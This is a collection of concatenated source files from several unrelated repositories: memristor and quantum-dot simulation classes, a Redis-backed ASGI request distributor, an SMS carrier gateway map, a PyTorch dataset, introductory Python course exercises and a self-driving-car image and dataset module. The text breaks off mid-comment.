memristor = decompress_pickle(f"{path}\\memristor.pbz2") if os.path.exists(f"{path}\\memristor.pbz2") else None
if verbose:
print(f'Memristor loaded: {time.time()-start}')
start = time.time()
circuit = decompress_pickle(f"{path}\\circuit.pbz2") if os.path.exists(f"{path}\\circuit.pbz2") else None
if verbose:
print(f'Circuit loaded: {time.time()-start}')
start = time.time()
memristor_sim = decompress_pickle(f"{path}\\memristor_sim.pbz2") if os.path.exists(f"{path}\\memristor_sim.pbz2") else None
if verbose:
print(f'Memristor simulation loaded: {time.time()-start}')
start = time.time()
pulsed_programming = decompress_pickle(f"{path}\\pulsed_programming.pbz2") if os.path.exists(f"{path}\\pulsed_programming.pbz2") else None
if verbose:
print(f'Pulsed programming loaded: {time.time()-start}')
start = time.time()
qd_simulation = decompress_pickle(f"{path}\\qd_simulation.pbz2") if os.path.exists(f"{path}\\qd_simulation.pbz2") else None
if verbose:
print(f'Quantum dot simulation loaded: {time.time()-start}')
algorithm = decompress_pickle(f"{path}\\algorithm.pbz2") if os.path.exists(f"{path}\\algorithm.pbz2") else None
if verbose:
print(f'Algorithm loaded: {time.time()-start}')
return memristor, circuit, memristor_sim, pulsed_programming, qd_simulation, algorithm
```
#### File: QDMS/qdms/PulsedProgramming.py
```python
import numpy as np
import math
import time
class PulsedProgramming:
"""
This class contains all the parameters for the Pulsed programming on a memristor model.
After initializing the parameters values, start the simulation with self.simulate()
Parameters
----------
max_voltage : float
The max voltage (V) of a pulse. If 0, no limit is apply.
pulse_algorithm : string
The pulse algorithm use. Those are the available choices (Sources in the methods). Default is 'fabien'.
'fabien' : Use fabien_convergence()
'log' : Use a log_convergence()
tolerance : float
The tolerance_value input is an int that represent the absolute tolerance (Ohm) from the res_states the
pulsed programming will find. Smaller is more precise, but too small can never converge.
is_relative_tolerance : bool
If true, the tolerance_value would be in percentage instead of (Ohm). ex: 10 : if true, 10% : if false, 10 Ohm
variability_write : iterable[float]
A gaussian distribution with (mu=0, sigma=variance_write)
index_variability : int
Index of the current variability. If over 1000, reset to 0.
variance_write : float
Variance of the gaussian distribution on the memristor write. See variability.
graph_resistance : List[Union[float, int]]
Contains all resistance of the simulation. It's used in the creation of plots.
graph_voltages : List[Union[float, int]]
Contains all voltages of the simulation. It's used in the creation of plots.
number_of_reading : int
The number of correct value read before passing to the next state.
max_pulse : int
The max number of pulses.
"""
def __init__(self, memristor_simulation, pulse_algorithm='fabien', max_voltage=0, tolerance=0, is_relative_tolerance=False,
variance_write=0, number_of_reading=1, max_pulse=20000, verbose=False, plot_memristor=0):
self.memristor_simulation = memristor_simulation
self.pulse_algorithm = pulse_algorithm
self.tolerance = tolerance
self.max_voltage = max_voltage
self.is_relative_tolerance = is_relative_tolerance
self.variance_write = variance_write
self.number_of_reading = number_of_reading
self.max_pulse = max_pulse
self.verbose = verbose
self.voltage_output = {}
self.plot_memristor = plot_memristor
self.index_variability = 0
self.variability_write = np.random.normal(0, variance_write, 1000)
self.graph_resistance = []
self.graph_voltages = []
def print(self):
print(self.pulse_algorithm)
print(self.tolerance)
print(self.max_voltage)
print(self.voltage_output)
print(self.is_relative_tolerance)
print(self.variance_write)
print(self.number_of_reading)
print(self.max_pulse)
print(self.verbose)
print(np.array(self.graph_resistance))
print(np.array(self.graph_voltages))
def write_resistance(self, memristor, voltage, t_pulse):
"""
This function change the resistance of the memristor by applying a voltage fo t_pulse.
Parameters
----------
memristor : Memristor
The memristor wrote.
voltage : float
The voltage (V) applied.
t_pulse : float
The time of the writing pulse. (s)
Returns
----------
"""
t = int(t_pulse / memristor.time_series_resolution)
signal = [voltage] * t
memristor.simulate(signal)
self.index_variability = self.index_variability + 1 if self.index_variability < len(self.variability_write) - 1 else 0
memristor.g = 1 / (1 / memristor.g + (1 / memristor.g) * self.variability_write[self.index_variability])
def find_number_iteration(self):
"""
This function find the number of iteration needed to create the resistance list depending on the distribution type
Returns
----------
number_iteration : int
number of iteration
"""
number_iteration = 1
if self.distribution_type == 'full_spread':
number_iteration = self.circuit.number_of_memristor
return number_iteration
def simulate(self, voltages_target, precision=None):
"""
This function will set the memristors to the resistance wanted in each voltages_target package.
Parameters
----------
voltages_target : dict
dict with keys as voltage and package as list of resistance
precision : list
[[macro_tune, is_relative_variability], [fine_tune, is_relative_variability]] for the balance() method.
"""
if self.pulse_algorithm != 'fabien' and self.pulse_algorithm != 'log':
raise(Exception(f'Pulse algorithm not supported: {self.pulse_algorithm}'))
# voltages_target_list = list(voltages_target.keys())
# resolution = voltages_target_list[1] - voltages_target_list[0]
index = 1
conf_done = 0
start_time = time.time()
diff_voltage = {}
for v in list(voltages_target.keys()):
if index == 1:
start_time_ = time.time()
self.simulate_list_memristor(voltages_target[v], precision)
self.voltage_output[self.memristor_simulation.circuit.current_v_out()] = [i.read() for i in self.memristor_simulation.circuit.list_memristor]
diff_voltage[abs(v - self.memristor_simulation.circuit.current_v_out())] = [round(1 / np.sum([1/res for res in voltages_target[v]]), 4), round(1 / self.memristor_simulation.circuit.current_conductance(), 4)]
if index == 50 and self.verbose:
conf_done += index
print(f'Conf done: {conf_done}\tTook: {round(time.time() - start_time_, 2)} s\tTime left: {round((time.time() - start_time_) * (len(voltages_target.keys()) - conf_done) / 50, 2)} s')
index = 0
index += 1
if self.verbose:
print(f'Total time: {time.time() - start_time}')
print()
for key in diff_voltage.keys():
print(f'{round(key*1000, 4)} mV\t{diff_voltage.get(key)[0]}\t{diff_voltage.get(key)[1]} (Ohm)')
print(f'Mean diff: {np.mean(list(diff_voltage.keys()))}')
print(f'Min diff: {np.min(list(diff_voltage.keys()))}\tMax diff: {np.max(list(diff_voltage.keys()))}')
return self.voltage_output
def simulate_list_memristor(self, list_resistance, precision):
"""
This function will set the memristors to the resistance wanted list_resistance.
Parameters
----------
list_resistance : list
list of the wanted resistance for the memristor.
precision : list
[[macro_tune, is_relative_variability], [fine_tune, is_relative_variability]] for the balance() method.
"""
for i in range(self.memristor_simulation.circuit.number_of_memristor):
plot = True if i == self.plot_memristor else False
if self.pulse_algorithm == 'fabien':
self.fabien_convergence(self.memristor_simulation.circuit.list_memristor[i], list_resistance[i], plot=plot)
elif self.pulse_algorithm == 'log':
self.log_convergence(self.memristor_simulation.circuit.list_memristor[i], list_resistance[i], plot=plot)
self.balance(list_resistance, precision)
def balance(self, list_resistance, precision):
"""
This function will set the memristors to the resistance wanted list_resistance.
Parameters
----------
list_resistance : list
list of the wanted resistance for the memristor.
precision : list
[[macro_tune, is_relative_variability], [fine_tune, is_relative_variability]] for the balance() method. If 0,
won't do it.
"""
final_g = np.sum([1 / i for i in list_resistance])
delta_g = final_g - self.memristor_simulation.circuit.current_conductance()
for i in range(self.memristor_simulation.circuit.number_of_memristor):
plot = True if -(i+1) == self.plot_memristor else False
final_res = 1 / (self.memristor_simulation.circuit.list_memristor[-(i+1)].g + delta_g)
if self.memristor_simulation.circuit.memristor_model.r_on <= final_res <= self.memristor_simulation.circuit.memristor_model.r_off:
p_tolerance, p_relative = self.tolerance, self.is_relative_tolerance
# print(f'{final_res}\t{1 / self.memristor_simulation.circuit.list_memristor[-(i+1)].g}\t{final_g - self.memristor_simulation.circuit.current_conductance()}')
if precision[0][0] != 0 or precision is not None:
self.tolerance, self.is_relative_tolerance = precision[0][0], precision[0][1]
self.fabien_convergence(self.memristor_simulation.circuit.list_memristor[-(i+1)], final_res, plot)
# print(f'{final_res}\t{1 / self.memristor_simulation.circuit.list_memristor[-(i+1)].g}\t{final_g - self.memristor_simulation.circuit.current_conductance()}')
if precision[1][0] != 0 or precision is not None:
self.tolerance, self.is_relative_tolerance = precision[1][0], precision[1][1]
self.small_convergence(self.memristor_simulation.circuit.list_memristor[-(i+1)], final_res, plot)
# print(f'{final_res}\t{1 / self.memristor_simulation.circuit.list_memristor[-(i+1)].g}\t{final_g - self.memristor_simulation.circuit.current_conductance()}')
self.tolerance, self.is_relative_tolerance = p_tolerance, p_relative
break
def small_convergence(self, memristor, target_res, plot=False):
"""
This function run the pulsed programming with a variable voltage to set the target_res for the memristor with a
really small increment.
Parameters
----------
memristor : Memristor
The memristor object
target_res : float
The target resistance
"""
step = 0.001
positive_voltage = voltage_set = 0.1
negative_voltage = voltage_reset = -0.1
if self.is_relative_tolerance:
res_max = target_res + self.tolerance * target_res / 100
res_min = target_res - self.tolerance * target_res / 100
else:
res_max = target_res + self.tolerance
res_min = target_res - self.tolerance
start_len_res = len(self.graph_resistance)
start_len_v = len(self.graph_voltages)
counter = 0
action = 'read'
flag_finish = False
counter_read = 0
while not flag_finish:
current_res = memristor.read()
if res_min <= current_res <= res_max:
counter_read += 1
if plot:
action = 'read'
self.graph_voltages.append([0.2, counter + start_len_v, action])
elif current_res < res_min:
if self.max_voltage != 0:
negative_voltage = -self.max_voltage if negative_voltage <= -self.max_voltage else negative_voltage
self.write_resistance(memristor, negative_voltage, 200e-9)
if plot:
action = 'reset'
self.graph_voltages.append([negative_voltage, counter + start_len_v, action])
negative_voltage -= step
positive_voltage = voltage_set
elif current_res > res_max:
if self.max_voltage != 0:
positive_voltage = self.max_voltage if positive_voltage >= self.max_voltage else positive_voltage
self.write_resistance(memristor, positive_voltage, 200e-9)
if plot:
action = 'set'
self.graph_voltages.append([positive_voltage, counter + start_len_v, action])
positive_voltage += step
negative_voltage = voltage_reset
if counter_read == self.number_of_reading:
flag_finish = not flag_finish
if counter >= self.max_pulse:
flag_finish = not flag_finish
print(f'Got max pulse {self.max_pulse}')
if plot:
self.graph_resistance.append([current_res, counter + start_len_res, action, flag_finish])
counter += 1
def log_convergence(self, memristor, target_res, plot=False):
"""
This function run the pulsed programming with a variable voltage to set the target_res for the memristor.
From : https://arxiv.org/abs/2103.09931
Parameters
----------
memristor : Memristor
The memristor object
target_res : float
The target resistance
"""
positive_voltage = voltage_set = 0.5
negative_voltage = voltage_reset = -0.5
# additional parameters
min_shift = 0.005
max_shift = 0.2
a = 0.1
if self.is_relative_tolerance:
res_max = target_res + self.tolerance * target_res / 100
res_min = target_res - self.tolerance * target_res / 100
else:
res_max = target_res + self.tolerance
res_min = target_res - self.tolerance
start_len_res = len(self.graph_resistance)
start_len_v = len(self.graph_voltages)
counter = 0
action = 'read'
flag_finish = False
counter_read = 0
r_shift = 1
current_res = memristor.read()
while not flag_finish:
if res_min < current_res < res_max:
counter_read += 1
if plot:
action = 'read'
self.graph_voltages.append([0.2, counter + start_len_v, action])
elif current_res > res_max:
if r_shift < min_shift * (memristor.r_off - memristor.r_on):
positive_voltage += a * np.log10(abs(target_res - current_res) / r_shift)
elif r_shift > max_shift * (memristor.r_off - memristor.r_on):
positive_voltage = voltage_set
if self.max_voltage != 0:
positive_voltage = self.max_voltage if positive_voltage >= self.max_voltage else positive_voltage
self.write_resistance(memristor, positive_voltage, 200e-9)
if plot:
action = 'set'
self.graph_voltages.append([positive_voltage, counter + start_len_v, action])
elif current_res < res_min:
if r_shift < min_shift * (memristor.r_off - memristor.r_on):
negative_voltage -= a * np.log10(abs((target_res - current_res) / r_shift))
elif r_shift > max_shift * (memristor.r_off - memristor.r_on):
negative_voltage = voltage_reset
if self.max_voltage != 0:
negative_voltage = -self.max_voltage if negative_voltage <= -self.max_voltage else negative_voltage
self.write_resistance(memristor, negative_voltage, 200e-9)
if plot:
action = 'reset'
self.graph_voltages.append([negative_voltage, counter + start_len_v, action])
if counter_read == self.number_of_reading:
flag_finish = not flag_finish
if counter >= self.max_pulse:
flag_finish = not flag_finish
print('Got max pulse')
if plot:
self.graph_resistance.append([current_res, counter + start_len_res, action, flag_finish])
counter += 1
previous_res = current_res
current_res = memristor.read()
r_shift = abs(current_res - previous_res) if abs(current_res - previous_res) != 0 else 1
def fabien_convergence(self, memristor, target_res, plot=False):
"""
This function run the pulsed programming with a variable voltage to set the target_res for the memristor.
From : https://iopscience.iop.org/article/10.1088/0957-4484/23/7/075201
Parameters
----------
memristor : Memristor
The memristor object
target_res : float
The target resistance
"""
step = 0.005
positive_voltage = voltage_set = 0.5
negative_voltage = voltage_reset = -0.5
if self.is_relative_tolerance:
res_max = target_res + self.tolerance * target_res / 100
res_min = target_res - self.tolerance * target_res / 100
else:
res_max = target_res + self.tolerance
res_min = target_res - self.tolerance
start_len_res = len(self.graph_resistance)
start_len_v = len(self.graph_voltages)
counter = 0
action = 'read'
flag_finish = False
counter_read = 0
while not flag_finish:
current_res = memristor.read()
if res_min <= current_res <= res_max:
counter_read += 1
if plot:
action = 'read'
self.graph_voltages.append([0.2, counter + start_len_v, action])
elif current_res < res_min:
if self.max_voltage != 0:
negative_voltage = -self.max_voltage if negative_voltage <= -self.max_voltage else negative_voltage
self.write_resistance(memristor, negative_voltage, 200e-9)
if plot:
action = 'reset'
self.graph_voltages.append([negative_voltage, counter + start_len_v, action])
negative_voltage -= step
positive_voltage = voltage_set
elif current_res > res_max:
if self.max_voltage != 0:
positive_voltage = self.max_voltage if positive_voltage >= self.max_voltage else positive_voltage
self.write_resistance(memristor, positive_voltage, 200e-9)
if plot:
action = 'set'
self.graph_voltages.append([positive_voltage, counter + start_len_v, action])
positive_voltage += step
negative_voltage = voltage_reset
if counter_read == self.number_of_reading:
flag_finish = not flag_finish
if counter >= self.max_pulse:
flag_finish = not flag_finish
print('Got max pulse')
if plot:
self.graph_resistance.append([current_res, counter + start_len_res, action, flag_finish])
# print(f'{self.graph_resistance[-1]}\t{self.graph_voltages[-1]}')
counter += 1
```
#### File: QDMS/qdms/QDSimulation.py
```python
import time
from .coulomb_blockade import *
class QDSimulation:
"""
This class contains all the parameters for the quantum dot simulation using coulomb_blockade.py.
After initializing the parameters values, start the simulation with self.simulate()
Parameters
----------
stability_diagram : list of list of float
Contains the number of electron depending the voltage in x or y.
parameter_model : string
Parameter model set Cg1, Cg2, CL and CR according to existing quantum dots. UNSW is the default.
Here are the implemented model:
'UNSW' : http://unsworks.unsw.edu.au/fapi/datastream/unsworks:42863/SOURCE02?view=true#page=172&zoom=100,160,768
Range: x = y = (0, 0.05)
'QuTech' : https://www.nature.com/articles/s41586-021-03469-4
Range: x = y = (0, 0.15)
'Princeton' : https://dataspace.princeton.edu/bitstream/88435/dsp01f4752k519/1/Zajac_princeton_0181D_12764.pdf
Range: x = y = (0, 0.035)
'Sandia_national_lab' : https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=7838537
Range: x = y = (0, 0.4)
'CEA_LETI' : https://journals.aps.org/prapplied/abstract/10.1103/PhysRevApplied.14.024066
Range: x = (0, 0.09) ; y = (0, 0.045)
'UCL' : https://journals.aps.org/prxquantum/abstract/10.1103/PRXQuantum.2.010353
Range: x = y = (0, 0.95)
voltages : Iterable[float]
Contains the voltages (V) from the memristor simulation.
Cg1 : float
Gate 1 capacitance (F).
Cg2 : float
Gate 2 capacitance (F).
CL : float
Ratio of the left capacitance (F).
CR : float
Ratio of the right capacitance (F).
T : float
Temperature (K)
N_max : int
Maximum number of electron
Cm : float
Ratio of the cross capacitance.
verbose : bool
If true, output in console of time.
"""
def __init__(self, voltages_x, voltages_y, T=0.1, Cm=0.4, parameter_model='UNSW', verbose=True):
self.stability_diagram = [[None for _ in range(len(voltages_x))] for _ in range(len(voltages_y))]
self.voltages_x = voltages_x
self.voltages_y = voltages_y
self.Cg1 = 0
self.Cg2 = 0
self.CL = 0
self.CR = 0
self.parameter_model = parameter_model.lower()
self.set_parameter_model()
self.T = T
self.Cm = Cm
self.kB = 1.381e-23
self.N_min, self.N_max = self.find_number_electron()
self.verbose = verbose
def print(self):
print(np.array(self.stability_diagram))
print(np.array(self.voltages_x))
print(np.array(self.voltages_y))
print(self.Cg1)
print(self.Cg2)
print(self.CL)
print(self.CR)
print(self.T)
print(self.Cm)
print(self.kB)
print(self.N_min)
print(self.N_max)
print(self.verbose)
def set_parameter_model(self):
if self.parameter_model == 'UNSW'.lower():
self.Cg1 = 10.3e-18
self.Cg2 = self.Cg1
self.CL = 5 * self.Cg1
self.CR = self.CL
elif self.parameter_model == 'QuTech'.lower():
self.Cg1 = 5.80e-18
self.Cg2 = 4.56e-18
self.CL = 2.5 * self.Cg1
self.CR = 2.7 * self.Cg2
elif self.parameter_model == 'Princeton'.lower():
self.Cg1 = 24.3e-18
self.Cg2 = self.Cg1
self.CL = 0.08 * self.Cg1
self.CR = self.CL
elif self.parameter_model == 'Sandia_national_lab'.lower():
self.Cg1 = 1.87e-18
self.Cg2 = self.Cg1
self.CL = 1.7*self.Cg1
self.CR = self.CL
elif self.parameter_model == 'CEA_LETI'.lower():
self.Cg1 = 10.3e-18
self.Cg2 = 19.7e-18
self.CL = 0.1 * self.Cg1
self.CR = 0.2 * self.Cg2
elif self.parameter_model == 'UCL'.lower():
self.Cg1 = 9.1e-19
self.Cg2 = self.Cg1
self.CL = 2.2 * self.Cg1
self.CR = self.CL
else:
raise Exception(f'Parameter model {self.parameter_model} not supported.')
def simulate(self):
"""
Function to simulate the number of electron depending on the voltages.
The output is stored in self.stability_diagram
Parameters
----------
Returns
----------
"""
if self.verbose:
print()
print("##########################")
print(f"Start QD simulation with {len(self.voltages_x)} voltages and {self.N_max} electrons")
x, y = np.meshgrid(self.voltages_x, self.voltages_y)
self.stability_diagram = N_moy_DQD(x, y, Cg1=self.Cg1, Cg2=self.Cg2, Cm=self.Cm * (self.Cg1+self.Cg2)/2,
CL=self.CL, CR=self.CR, N_min=self.N_min, N_max=self.N_max,
kBT=2 * self.kB * self.T, e=1.602e-19, verbose=self.verbose)
def find_number_electron(self):
if self.parameter_model == 'UNSW'.lower():
return int(min(self.voltages_x) * 65), int(max(self.voltages_x) * 65)
elif self.parameter_model == 'QuTech'.lower():
return int(min(self.voltages_x) * 30), int(max(self.voltages_x) * 35)
elif self.parameter_model == 'Princeton'.lower():
return int(min(self.voltages_x) * 155), int(max(self.voltages_x) * 155)
elif self.parameter_model == 'Sandia_national_lab'.lower():
return int(min(self.voltages_x) * 10), int(max(self.voltages_x) * 15)
elif self.parameter_model == 'CEA_LETI'.lower():
return int(min(self.voltages_x) * 60), int(max(self.voltages_x) * 125)
elif self.parameter_model == 'UCL'.lower():
return int(min(self.voltages_x) * 1), int(max(self.voltages_x) * 10)
else:
raise Exception(f'Parameter model {self.parameter_model} not supported.')
``` |
{
"source": "3jackdaws/distributed-asgi",
"score": 2
} |
#### File: distributed-asgi/distributed_asgi/producer.py
```python
import logging
import aioredis
import uuid
import asyncio
import marshal
import re
from .common import ASGI_EVENTS_KEY_PREFIX, send_error
from concurrent.futures import CancelledError
logger = logging.getLogger()
def print(*args):
logging.getLogger().info(*args)
class Distributor:
key = ASGI_EVENTS_KEY_PREFIX
worker_timeout = 5
redis_options = {
"address": "redis://localhost:6379",
"password": <PASSWORD>
}
def __init__(self, scope):
self.scope = scope
channel_base = str(uuid.uuid4()).replace("-", "")
self.recv_channel = f"{channel_base}-recv"
self.send_channel = f"{channel_base}-send"
self.recv_future = None # type: asyncio.Future
self.worker_info = None
async def __call__(self, receive, send):
consumer_channel = str(self.key)
message = {
"channels": [self.recv_channel, self.send_channel],
"scope": self.scope
}
data = marshal.dumps(message)
self.redis = await aioredis.create_redis(**self.redis_options)
# Push ASGI Event onto Redis queue
await self.redis.rpush(consumer_channel, data)
# Start forwarding events
self.recv_future = asyncio.ensure_future(self.handle_recv(receive))
# Wait for reply that worker has received event
response = await self.redis.blpop(self.send_channel, timeout=self.worker_timeout)
if response is None:
await send_error(send, 504, b"Worker Timeout")
logger.warning(f"No workers responded to [{self.key}] event")
self.stop()
else:
self.worker_info = marshal.loads(response[1])
await self.handle_send(send)
async def handle_recv(self, receive):
while True:
try:
message = await receive()
await self.redis.rpush(self.recv_channel, marshal.dumps(message))
except Exception as e:
if type(e) is not CancelledError:
logger.error(f"[RECV] {str(e)}")
async def handle_send(self, send):
while True:
try:
key, raw_message = await self.redis.blpop(self.send_channel)
message = marshal.loads(raw_message)
if message['type'] == "app.terminate":
self.stop()
break
await send(message)
except Exception as e:
if type(e) is not CancelledError:
logger.error(f"[SEND] {str(e)}")
def stop(self):
self.recv_future.cancel() if self.recv_future else None
def create_distributor(host='localhost', port='6379', db=None, password=<PASSWORD>, key=ASGI_EVENTS_KEY_PREFIX):
x = key
class ASGIDistributor(Distributor):
key = x
redis_options = {
"address": f"redis://{host}:{port}",
"password": password,
"db": db
}
return ASGIDistributor
def _get_key(path, routes:{}):
for pattern, key_template in routes.items():
match = pattern.match(path)
if match:
return match.expand(key_template)
return None
def create_path_distributor(
host='localhost',
port='6379',
db=None,
password=<PASSWORD>,
routes={".*": "ALL"}
):
routes = {re.compile(pattern):template for pattern, template in routes.items()}
def return_distributor(scope):
queue_key = _get_key(scope['path'], routes)
return create_distributor(
host,
port,
db,
password,
key=queue_key
)(scope)
return return_distributor
```
#### File: distributed-asgi/tests/test_things.py
```python
import pytest
from distributed_asgi import create_path_distributor
def test_path_distributor():
dist = create_path_distributor(routes={
"/api/([a-z-]+)": r"\1"
})
for path, expected_key in [
("/api/banana", "banana"),
("/banana", None),
()
]:
instance = dist({"path":path})
assert instance.key == expected_key
``` |
{
"source": "3jackdaws/esms",
"score": 2
} |
#### File: esms/esms/endpoints.py
```python
from .exceptions import UnsupportedCarrier
CARRIERS = {
"alltel": {
"sms": "message.alltel.com",
"mms": "mms.alltelwireless.com"
},
"att": {
"sms": "txt.att.net",
"mms": "mms.att.net"
},
"boost": {
"sms": "myboostmobile.com",
"mms": "myboostmobile.com"
},
"cricket": {
"sms": "sms.cricketwireless.net",
"mms": "mms.cricketwireless.net"
},
"fi": {
"sms": "msg.fi.google.com",
"mms": "msg.fi.google.com"
},
"sprint": {
"sms": "messaging.sprintpcs.com",
"mms": "pm.sprint.com"
},
"tmobile": {
"sms": "tmomail.net",
"mms": "tmomail.net"
},
"us-cellular": {
"sms": "email.uscc.net",
"mms": "mms.uscc.net"
},
"verizon": {
"sms": "vtext.com",
"mms": "vzwpix.com"
},
"virgin": {
"sms": "vmobl.com",
"mms": "vmpix.com"
}
}
def get_carrier(carrier):
carrier = CARRIERS.get(carrier)
if carrier is None:
raise UnsupportedCarrier("{} does not map to a supported carrier".format(carrier))
return carrier
def get_sms_address(carrier:str, number:str):
carrier = get_carrier(carrier)
return "{}@{}".format(
number,
carrier.get("sms")
)
def get_mms_address(carrier, number):
carrier = get_carrier(carrier)
return "{}@{}".format(
number,
carrier.get("mms")
)
``` |
{
"source": "3jane/pytorch_ext",
"score": 3
} |
#### File: data/datasets/TimeseriesDataset.py
```python
from torch.utils.data import Dataset
class TimeseriesDataset(Dataset):
def __init__(self, X, y, seq_len=1):
self.X = X
self.y = y
self.seq_len = seq_len
def __len__(self):
return self.X.__len__() - (self.seq_len - 1)
def __getitem__(self, index):
return self.X[index:index + self.seq_len], self.y[index + self.seq_len - 1]
```
#### File: 3jane/pytorch_ext/setup.py
```python
from setuptools import setup, find_packages
from pip._internal.network.session import PipSession
from pip._internal.req import parse_requirements
pip_session = PipSession()
with open('.version') as f:
VERSION = f.read()
def parse_reqs(path):
return [r.requirement for r in parse_requirements(path, session=pip_session)]
with open('README.md') as f:
DESCRIPTION = f.read()
setup(
name='pytorchext',
version=VERSION,
author='<EMAIL>',
author_email='<EMAIL>',
description='pytorch extension',
long_description=DESCRIPTION,
long_description_content_type='text/markdown',
url='https://github.com/3jane/pytorch_ext',
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
python_requires='>=3.6',
packages=find_packages(include=["pytorchext*"]),
install_requires=parse_reqs('requirements.txt'),
)
``` |
{
"source": "3keepmovingforward3/ENGR1102",
"score": 4
} |
#### File: python/code sprint/code sprint 4.py
```python
import pprint
"""
* PREMISE: This Code Sprint is meant to test your proficiency in array
* creation and manipulation. It will also test your ability to
* construct a proper loop. Lastly, it will test your ability to breakdown
* a problem into smaller subsections, i.e. functions.
*
* INPUT: You are given one 2-dimensional array, inventory, as input that correspond
* to the inventory list of your supermarket. You are also given a target department
* to search for when obtaining the total product count. Lastly, you are given an
* option, always '0' for this Code Sprint, that dictates what task, i.e. which created
* function to call, you will perform.
*
* OUTPUT: You are to RETURN a single integer from your created function, which
* holds the total product count from the target department. Then you are to display
* this result using the required string format given to you above.
"""
def store_owner(inventory, option, target, sale_item, price_change, count_change):
if len(inventory) == 0:
print("Error: Empty list!")
else:
print("Welcome to ENGR 1102's Stop-n-shop!")
if option == '0':
print("That was last weeks' problem!")
elif option == '1':
updatePrice(inventory,sale_item,price_change)
elif option == '2':
updateQuantity(inventory,sale_item,count_change)
else:
print("I don't know how to do that!")
##########################################################################################
# Start your function(s) under here
##########################################################################################
def updatePrice(inventory,sale_item,price_change):
print("Which item do you wish to update the price for?")
j = 0
for i in range(0,10):
if (inventory[i][0] == sale_item) and (sale_item in inventory[i][0]) :
j = i
print(sale_item)
print("Please enter the new price of "+str(sale_item)+ ":")
inventory[j][2]= price_change
inventory[j][3]= 10
print(inventory[j][2])
print("The new inventory is:")
for rows in inventory:
print(rows)
return()
print("We don't have any "+sale_item+" left in stock.")
def updateQuantity(inventory,sale_item,count_change):
print("Which item do you wish to update the quantity for?")
j=0
for j in range(0,10):
if inventory[j][0] == sale_item:
print(sale_item)
print("Please enter the new quantity of "+str(sale_item)+":")
inventory[j][3]= count_change
print(count_change)
print("The new inventory is:")
for rows in inventory:
print(rows)
return()
print("We don't have any "+sale_item+" left in stock.")
```
#### File: coreskillsdemo/coreskillsans/popularity_contest.py
```python
def popularity_contest(name_list):
cnt = Counter()
for word in name_list:
cnt[word] += 1
t = word
final = OrderedDict(sorted(cnt.items(), key=lambda t: t[0]))
for key,word in final.items():
print(key,"got",word,"votes.")
print(t,"Wins!")
```
#### File: conditional code/which books do i need for class/task.py
```python
def books_collections(book):
#if the input string “book” equals “Calculus” return “I have my Calculus book.”
#else if the input string “book” equals “History” return “I have my History book.”
#else if the input string “book” equals “Circuits” return "I have my Circuits book."
#for everything else return " I don't have that book." */
```
#### File: console input and output/middle ground/task.py
```python
def m_g():
# Start your code below (tip: Make sure to indent your code)
return()
```
#### File: data types/stringsandintergers/task.py
```python
def count_eggs(eggsJohn, eggsMary):
# Start your code below (tip: Make sure to indent your code)
return()
```
#### File: functions/getting started with functions/task.py
```python
import math
def factorial(num):
return(math.factorial(num))
```
#### File: loops/counter/task.py
```python
def counter(endCount):
f = open("test.txt","w")
# ***User Code Below*** #
for __ in range(______):
# Non User Code
f.write(str(____)+"\n")
# User Code
print(_____)
# ***End User Code*** #
f.close
```
#### File: loops/Nth Factorial/task.py
```python
import math
def nth_fact(nth):
# Enter your code here
return(math.factorial(nth))
```
#### File: objects/creating your first object/task.py
```python
class Rectangle(object):
length = 0
width = 0
# This is an initialization function for a class in Python.
#
def __init__(self, length, width):
# Fill in this function to define a new object
# Hint: Each object has its own length and width.
# Use the self keyword to initialize the length and width
# Hint: self._____=_____
# We are able to create class functions for use outside of the class.
# This is normally to modify class variables.
# Create two functions below to calculate the perimeter and area.
def getArea(self):
return ()
def getPerimeter(self):
return ()
```
#### File: objects/iterating over objects/task.py
```python
def getCount(objects):
# Write your code here.
return()
```
#### File: variables/Gradebook/task.py
```python
def grade_avrg():
# User Code Below
return ()
``` |
{
"source": "3keepmovingforward3/suiron",
"score": 3
} |
#### File: suiron/core/SuironCV.py
```python
"
import math
import cv2
import numpy as np
# Median blur
def get_median_blur(gray_frame):
return cv2.medianBlur(gray_frame, 5)
# Canny edge detection
def get_canny(gray_frame):
return cv2.Canny(gray_frame, 50, 200, apertureSize=3)
# Hough lines
def get_lane_lines(inframe):
frame = inframe.copy()
ret_frame = np.zeros(frame.shape, np.uint8)
# We converted it into RGB when we normalized it
gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
gray = get_median_blur(gray)
canny = get_canny(gray)
# Hough lines
# threshold = number of 'votes' before hough algorithm considers it a line
lines = cv2.HoughLinesP(canny, 1, np.pi/180, threshold=25, minLineLength=40, maxLineGap=100)
try:
r = lines.shape[0]
except AttributeError:
r = 0
for i in range(0):
for x1, y1, x2, y2 in lines[i]:
# Degrees as its easier for me to conceptualize
angle = math.atan2(y1-y2, x1-x2)*180/np.pi
# If it looks like a left or right lane
# Draw it onto the new image
if 100 < angle < 170 or -170 < angle < -100:
cv2.line(ret_frame, (x1, y1), (x2, y2), (255, 255, 255), 10)
return ret_frame
```
#### File: suiron/utils/datasets.py
```python
import numpy as np
import pandas as pd
from suiron.utils.img_serializer import deserialize_image
from suiron.utils.functions import raw_to_cnn
# Gets servo dataset
def get_servo_dataset(filename, start_index=0, end_index=None):
data = pd.DataFrame.from_csv(filename)
# Outputs
x = []
# Servo ranges from 40-150
servo = []
for i in data.index[start_index:end_index]:
# Don't want noisy data
if data['servo'][i] < 40 or data['servo'][i] > 150:
continue
# Append
x.append(deserialize_image(data['image'][i]))
servo.append(raw_to_cnn(data['servo'][i]))
return x, servo
# Gets motor output dataset
# Assumption is that motor and servo has
# some sort of relationship
def get_motor_dataset(filename, start_index=0, end_index=None):
data = pd.DataFrame.from_csv(filename)
# Servo
servo = []
# Motor ranges from 40-150
motor = []
for i in data.index[start_index:end_index]:
# Don't want noisy data
if data['motor'][i] < 40 or data['motor'][i] > 150:
continue
if data['servo'][i] < 40 or data['servo'][i] > 150:
continue
# Append
servo.append(raw_to_cnn(data['servo'][i]))
motor.append(raw_to_cnn(data['motor'][i], min_arduino=60.0, max_arduino=90.0))
return servo, motor
```
#### File: suiron/utils/functions.py
```python
import numpy as np
#Map function from arduino
def arduino_map(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
# Converts raw values to target (Y) values
# for the convolutional neural network
def raw_to_cnn(y, min_arduino=40.0, max_arduino=150.0):
# Servo values
# Map from 40-140 to 1-10 and
# Convert to values between 0-1 because neurons can only contain
